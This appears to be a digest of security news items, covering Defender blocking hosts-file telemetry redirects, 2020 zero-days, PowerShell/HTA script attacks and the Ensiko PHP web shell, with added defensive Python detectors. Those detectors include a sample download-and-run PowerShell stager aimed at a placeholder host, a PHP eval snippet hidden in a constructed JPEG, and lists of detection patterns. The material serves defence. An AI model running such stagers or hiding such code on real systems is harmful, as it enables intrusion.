The native antivirus client of the Windows 10 operating system, Microsoft Defender, has started to flag the hosts file on the system as malicious if it contains redirects for certain Microsoft servers.
The hosts file is a simple plain text file that maps hostnames to IP addresses and can therefore be used to redirect connections. Users find it under C:\Windows\System32\drivers\etc\hosts on any Windows system, and it is easy enough to use it to redirect requests. It has been used for ages to block known malicious sites or advertisement sites.
All you have to do is add a line of the form 127.0.0.1 www.microsoft.com to the hosts file to redirect requests for the site (“www.microsoft.com” in this case) to the local computer. The effect is simple: the request is blocked.
With the release of Windows 10, blocking Telemetry servers through the hosts file became far more common. Privacy tools would add known Telemetry servers to the hosts file to block connections and thus the transmission of Telemetry data to Microsoft.
Microsoft Defender Antivirus flags certain hosts file changes as a threat. An attempt to add telemetry.microsoft.com and microsoft.com redirects to 127.0.0.1 to the hosts file resulted in Microsoft Defender flagging the file and restoring the original version.
Attempts to save the file may display the following notification by Microsoft Defender:
Operation did not complete successfully because the file contains a virus or potentially unwanted software.
It is possible that other servers will also be seen as a threat by Microsoft Defender. Windows 10 users may allow the threat in Microsoft Defender, at least for now, to add these redirects to the file again. The problem with the approach is that it will allow all modifications, even those by malicious software. Another option is to turn off Microsoft Defender and to start using a different security solution for Windows.
A false positive seems unlikely considering that the list of servers includes mostly Telemetry servers.
Windows 10 tools that add entries to the hosts file may be affected negatively by this. Most privacy tools that manipulate the hosts file to block Telemetry will certainly fail to add the entries to the hosts file if Microsoft Defender is the resident antivirus solution.
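To see which lines of a hosts file would provoke this behaviour before Defender restores the file, here is an added example (my own code, not from the article or from Microsoft): it parses hosts-file syntax and reports entries that send microsoft.com hostnames to a loopback or null address. The sample hosts content is constructed for the demo, and the watched suffix list contains only microsoft.com because the article names no other servers; extend it for your own environment.

```python
"""Audit a Windows hosts file for entries that sinkhole Microsoft hostnames.

Added example, not from the article: a simplified version of the check Microsoft
Defender appears to apply, so an administrator can see which lines of their own
hosts file would trigger it. The sample hosts content below is constructed.
"""
import ipaddress
import re
from typing import List, NamedTuple

# A hostname pointed at one of these addresses goes nowhere.
SINKHOLE_ADDRESSES = {"127.0.0.1", "0.0.0.0", "::1", "::"}

# The article reports Defender objecting to microsoft.com redirects and says other
# servers may be affected; only the documented suffix is listed here (assumption).
WATCHED_SUFFIXES = ("microsoft.com",)

# Plain hostname syntax; a URL such as http://www.microsoft.com does not match and
# would never be consulted by the resolver anyway.
HOST_RE = re.compile(r"^[a-z0-9_]([a-z0-9_-]*[a-z0-9_])?(\.[a-z0-9_]([a-z0-9_-]*[a-z0-9_])?)*\.?$")


class HostsEntry(NamedTuple):
    line_no: int
    address: str
    hostname: str


def parse_hosts(text: str) -> List[HostsEntry]:
    """Parse hosts-file syntax: '<address> <host> [<host> ...] [# comment]'."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments and surrounding whitespace
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                             # malformed line, resolver ignores it too
        try:
            address = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue                             # first field must be an IP address
        for hostname in fields[1:]:
            hostname = hostname.lower()
            if HOST_RE.match(hostname):
                entries.append(HostsEntry(line_no, address, hostname))
    return entries


def is_watched(hostname: str) -> bool:
    return any(hostname == s or hostname.endswith("." + s) for s in WATCHED_SUFFIXES)


def find_sinkholed_microsoft_hosts(text: str) -> List[HostsEntry]:
    """Return entries that send a watched Microsoft hostname to a sinkhole address."""
    return [e for e in parse_hosts(text)
            if e.address in SINKHOLE_ADDRESSES and is_watched(e.hostname)]


# Constructed sample hosts file: default entries, an ad-block entry, privacy-tool
# entries, one line using the wrong (URL) syntax, and one non-sinkhole redirect.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0   ads.example.net            # generic ad blocking, not a Microsoft host
127.0.0.1 telemetry.microsoft.com   # privacy tool entry
127.0.0.1 http://www.microsoft.com  # wrong syntax: a URL is not a hostname
0.0.0.0   vortex.data.microsoft.com settings-win.data.microsoft.com
192.0.2.10 www.microsoft.com        # not a sinkhole, just a different address
"""

if __name__ == "__main__":
    for e in find_sinkholed_microsoft_hosts(SAMPLE_HOSTS):
        print(f"line {e.line_no}: {e.hostname} -> {e.address}")
```

Run it against the real file by reading C:\Windows\System32\drivers\etc\hosts into `find_sinkholed_microsoft_hosts`; the URL-style line in the sample is deliberately skipped, since the resolver would not honour it either.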
According to Google’s Project Zero security team, there have been 11 zero-day vulnerabilities exploited in the wild in the first half of 2020.
2020 H1 ZERO-DAYS
1. Firefox (CVE-2019-17026)
This zero-day was used as part of a combo with another zero-day. It has since been patched.
2. Internet Explorer (CVE-2020-0674)
Both the Firefox zero-day listed above and this one have been used by a nation-state hacking group known as DarkHotel, believed to be operating out of the Korean peninsula (unclear if from North Korea or South Korea). Both zero-days have been used to spy on targets located in China and Japan, which is why they were both discovered by Qihoo 360 (Chinese antivirus maker) and JPCERT (Japan’s Computer Emergency Response Team).
Victims of this campaign were redirected to a website where they’d be served either the Firefox or IE zero-day, and then they were infected with the Gh0st remote access trojan.
3. Chrome (CVE-2020-6418)
This zero-day was detected exploited in the wild by Google’s Threat Analysis Group, and details about the attacks where it was used were never released.
4. & 5. Trend Micro OfficeScan (CVE-2020-8467 and CVE-2020-8468)
Both zero-days were discovered internally by Trend Micro staff. It is believed the zero-days were discovered while Trend Micro investigated a 2019 zero-day in the same product that was used in the Mitsubishi hack.
6. & 7. Firefox (CVE-2020-6819 and CVE-2020-6820)
Details about the attacks where these two Firefox zero-days have been used have not yet been released, although security researchers suggested these might be part of a larger exploit chain.
8. & 9. & 10. (CVE-2020-0938, CVE-2020-1020, and CVE-2020-1027)
All three bugs have been discovered and reported to Microsoft by Google TAG, and just like most Google TAG discoveries, no details about the attacks have been released — yet.
11. Sophos XG Firewall (CVE-2020-12271)
A group of hackers discovered earlier this year a zero-day in XG, a top-shelf firewall product developed by UK security firm Sophos. The zero-day, an SQL injection in the firewall’s management panel, allowed hackers to plant the Asnarok backdoor on infected systems. In an investigation, Sophos said hackers tried to deploy the Ragnarok ransomware on infected hosts once the zero-day made the news, but the company says it blocked most attempts.
In 2019, 20 zero-days were identified in total. We will have to wait and watch for the rest of the month to see how the total tally ends up.
Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to a disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movements post-infection.
How attackers use scripts
Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.
Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.
Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.
PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.
A malicious file loader using PowerShell
Attackers use PowerShell in their attacks to load malware directly in memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.
Additional script-based threats
An HTML Application (HTA) is a Microsoft Windows file type meant to run on Internet Explorer, which combines HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through the Microsoft HTA engine (mshta.exe), which runs with the local user’s privileges instead of Internet Explorer’s restricted privileges, and so has access to the filesystem and registry.
Malicious HTA files allow scripts to run on the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or reached through redirects from malicious websites.
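The two techniques described in this section, PowerShell staging a payload in memory and HTA files run through mshta.exe, leave a trace in process-creation telemetry even when nothing touches the disk. The following added example (my own code, not from the article) shows detection logic over constructed log lines in a simple `timestamp,parent_image,image,command_line` format standing in for EDR or Sysmon events: it decodes `-EncodedCommand` arguments and looks for in-memory download/execute indicators, and it flags mshta.exe launched from an Office parent. The field layout, rule names and indicator list are this example's own assumptions.

```python
"""Detect script-based execution patterns in process-creation logs.

Added example, not from the article: constructed log lines in a
'timestamp,parent_image,image,command_line' format stand in for EDR or Sysmon
process-creation events. Rule names, indicators and parents are this example's own.
"""
import base64
import re
from typing import List, NamedTuple, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Substrings that commonly appear when a script stages a payload in memory
# rather than writing it to disk (matched case-insensitively).
IN_MEMORY_INDICATORS = ("invoke-expression", "iex", "downloadstring",
                        "frombase64string", "reflection.assembly", "memorystream")


class Alert(NamedTuple):
    line_no: int
    rule: str
    detail: str


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Decode the argument of -EncodedCommand (PowerShell also accepts -e, -ec, -enc)."""
    for m in re.finditer(r"(?i)(?:^|\s)-([a-z]+)\s+([A-Za-z0-9+/=]+)", command_line):
        flag, payload = m.group(1).lower(), m.group(2)
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                # PowerShell expects base64 over the UTF-16LE encoding of the script
                return base64.b64decode(payload).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def found_indicators(text: str) -> List[str]:
    low = text.lower()
    return [ind for ind in IN_MEMORY_INDICATORS if ind in low]


def analyze_event(line_no: int, parent: str, image: str, command_line: str) -> List[Alert]:
    alerts = []
    image_name = image.rsplit("\\", 1)[-1].lower()
    parent_name = parent.rsplit("\\", 1)[-1].lower()

    if image_name == "mshta.exe":
        if parent_name in OFFICE_PARENTS:
            alerts.append(Alert(line_no, "hta_from_office",
                                f"mshta.exe spawned by {parent_name}: {command_line}"))
        else:
            alerts.append(Alert(line_no, "hta_execution", command_line))

    if image_name in ("powershell.exe", "pwsh.exe"):
        decoded = extract_encoded_command(command_line)
        hits = found_indicators(decoded if decoded is not None else command_line)
        if decoded is not None and hits:
            alerts.append(Alert(line_no, "encoded_powershell_in_memory",
                                f"decoded: {decoded.strip()} | indicators: {hits}"))
        elif hits:
            alerts.append(Alert(line_no, "powershell_in_memory", f"indicators: {hits}"))
    return alerts


def scan_log(log_text: str) -> List[Alert]:
    alerts = []
    for line_no, raw in enumerate(log_text.splitlines(), start=1):
        if not raw.strip():
            continue
        fields = raw.split(",", 3)          # command line may itself contain commas
        if len(fields) != 4:
            continue
        _ts, parent, image, command_line = fields
        alerts.extend(analyze_event(line_no, parent, image, command_line))
    return alerts


# Constructed sample: a stager command line encoded the way -EncodedCommand expects.
# example.invalid is a reserved name that never resolves.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_LOG = f"""\
2020-07-20T09:00:01Z,C:\\Windows\\explorer.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe -File C:\\scripts\\backup.ps1
2020-07-20T09:02:13Z,C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,C:\\Windows\\System32\\mshta.exe,mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\invoice.hta
2020-07-20T09:02:15Z,C:\\Windows\\System32\\mshta.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {_ENCODED}
2020-07-20T09:05:40Z,C:\\Windows\\System32\\svchost.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe -NoProfile -Command Get-Service
"""

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"line {a.line_no} [{a.rule}] {a.detail}")
```

The first and last sample lines are the kind of scripting the article's first employee group does every day and produce no alert; the middle two are the HTA-then-PowerShell sequence described above. Decoding the encoded argument is what makes the difference: without it, the third line looks like an opaque blob and the in-memory indicators are invisible.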
Is it safe to run scripts in the network?
With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.
A basic first step any organization should consider is segmenting employees into several groups:
1. Running scripts is part of their day-to-day job
2. Running scripts is not common but might happen
3. There is no need to run scripts
With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance the ability to detect script-based attacks while allowing users who need to use scripts for their job function to do so without interruption.
Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP, making it a high risk for Windows, macOS, and Linux web servers.
The malware received the name Ensiko and is a web shell written in PHP. Attackers can use it to remotely control a compromised system and run a host of malicious activities.
Among Ensiko’s large list of capabilities, the file-encryption component stands out, as it can be used for ransomware attacks against servers.
Researchers found that it uses the symmetric Rijndael-128 cipher in CBC mode to encrypt files.
Ensiko encrypts files in the web shell directory and its subdirectories and appends the .BAK extension to processed files.
The malware can be password protected to secure access and avoid a takeover like the one that happened last week with Emotet, when someone replaced the malware payloads with memes.
Authenticating to this web shell is not straightforward. The developer hid the login form on a “Not Found” page. For the analyzed sample, the access key is “RaBiitch.”
To expand its capabilities, Ensiko can load several tools, which the malware downloads from Pastebin and stores in a directory named “tools_ensikology.”
One of the functions of the malware is called Steganologer, which can identify image files that have code in their metadata (EXIF headers). The code is then extracted and executed on the compromised server.
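Steganologer extracts and runs code hidden in image metadata; the defender's counterpart is to find such images before a web shell does. The following added example (my own code, not Ensiko's and not from the researchers' analysis) walks a JPEG's segment structure and flags APPn (Exif, JFIF) and COM metadata segments whose bytes contain script patterns. The JPEG samples are built in the code, and the pattern list is this example's own and not exhaustive.

```python
"""Scan a JPEG's metadata segments for embedded script code.

Added example, not from the article: a defender-side check for code hidden in
EXIF or other JPEG metadata. The JPEG samples are constructed; the pattern list
is an assumption and is not exhaustive.
"""
import struct
from typing import Iterator, List, NamedTuple, Tuple

SOI, SOS, EOI = 0xD8, 0xDA, 0xD9
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))   # markers with no length field

SCRIPT_PATTERNS = (b"<?php", b"<?=", b"<script", b"eval(", b"base64_decode(",
                   b"system(", b"passthru(", b"shell_exec(")


class Finding(NamedTuple):
    marker: int            # e.g. 0xE1 for APP1 (Exif)
    offset: int            # byte offset of the segment payload within the file
    patterns: List[bytes]


def iter_segments(data: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Yield (marker, payload_offset, payload) for each segment up to and including SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker, skip it
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            if marker == EOI:
                return
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # includes the 2 length bytes
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length at offset {pos}")
        payload = data[pos + 4:pos + 2 + length]
        yield marker, pos + 4, payload
        if marker == SOS:
            return                         # entropy-coded image data follows; stop parsing
        pos += 2 + length


def scan_metadata(data: bytes) -> List[Finding]:
    """Return metadata segments (APP0-APP15, COM) whose bytes contain script patterns."""
    findings = []
    for marker, offset, payload in iter_segments(data):
        if not (0xE0 <= marker <= 0xEF or marker == 0xFE):
            continue
        hits = [p for p in SCRIPT_PATTERNS if p in payload.lower()]
        if hits:
            findings.append(Finding(marker, offset, hits))
    return findings


def build_jpeg(segments: List[Tuple[int, bytes]]) -> bytes:
    """Assemble a minimal JPEG skeleton: SOI, the given segments, a stub SOS, EOI."""
    out = bytearray(b"\xff\xd8")
    for marker, payload in segments + [(SOS, b"\x01\x01\x00\x00\x3f\x00")]:
        out += bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload
    out += b"\xff\xd9"
    return bytes(out)


JFIF_PAYLOAD = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
EXIF_HEADER = b"Exif\x00\x00MM\x00\x2a\x00\x00\x00\x08"      # Exif + big-endian TIFF header

# Constructed samples: one with ordinary metadata, one with PHP in the Exif segment.
CLEAN_JPEG = build_jpeg([
    (0xE0, JFIF_PAYLOAD),
    (0xE1, EXIF_HEADER + b"\x00\x00" + b"Artist: Constructed Sample"),
])
SUSPICIOUS_JPEG = build_jpeg([
    (0xE0, JFIF_PAYLOAD),
    (0xE1, EXIF_HEADER + b"\x00\x00" + b"UserComment: <?php /* constructed */ eval($payload); ?>"),
])

if __name__ == "__main__":
    for f in scan_metadata(SUSPICIOUS_JPEG):
        print(f"APP{f.marker - 0xE0} segment at offset {f.offset}: {f.patterns}")
```

Because the scanner walks the marker structure rather than grepping the whole file, it reports where the code sits and ignores the entropy-coded image data, where byte sequences that look like `eval(` can occur by chance. On a server, run `scan_metadata` over upload directories; a truncated or malformed file raises `ValueError` rather than being silently passed.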
Ensiko can also check if a web shell from a predefined list is present on a remote host. Another scanning function called Remote File Check allows the operator to look for arbitrary files on a remote system.
Another function in this malicious tool allows recursive overwriting of all files with a specified extension in the web shell’s directory.
Ensiko’s capabilities do not stop at this, though. The malware lets threat actors run brute-force attacks on FTP, cPanel, and Telnet, thus extending their access.